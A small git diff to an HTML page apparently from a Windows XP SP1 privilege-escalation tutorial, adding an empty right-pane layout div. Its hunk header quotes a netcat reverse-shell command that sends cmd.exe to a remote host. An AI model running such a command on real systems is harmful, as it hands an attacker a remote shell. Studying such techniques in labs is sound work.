--- a/content/winxp-sp1-privesc.html
+++ b/content/winxp-sp1-privesc.html
@@ -350,6 +350,10 @@ C:\nc.exe -nv 192.168.0.2 4445 -e C:\WINDOWS\System32\cmd.exe
 					  </div>
 				</div>
 				<!-- END OF CONTENT -->
+				<!-- RIGHT PANE -->
+				<div class="col-sm-2" id="right-pane">
+				</div>
+				<!-- END OF RIGHT PANE -->
 				<!-- SCRIPTS -->
 				<!-- END OF SCRIPTS -->
 			</div>
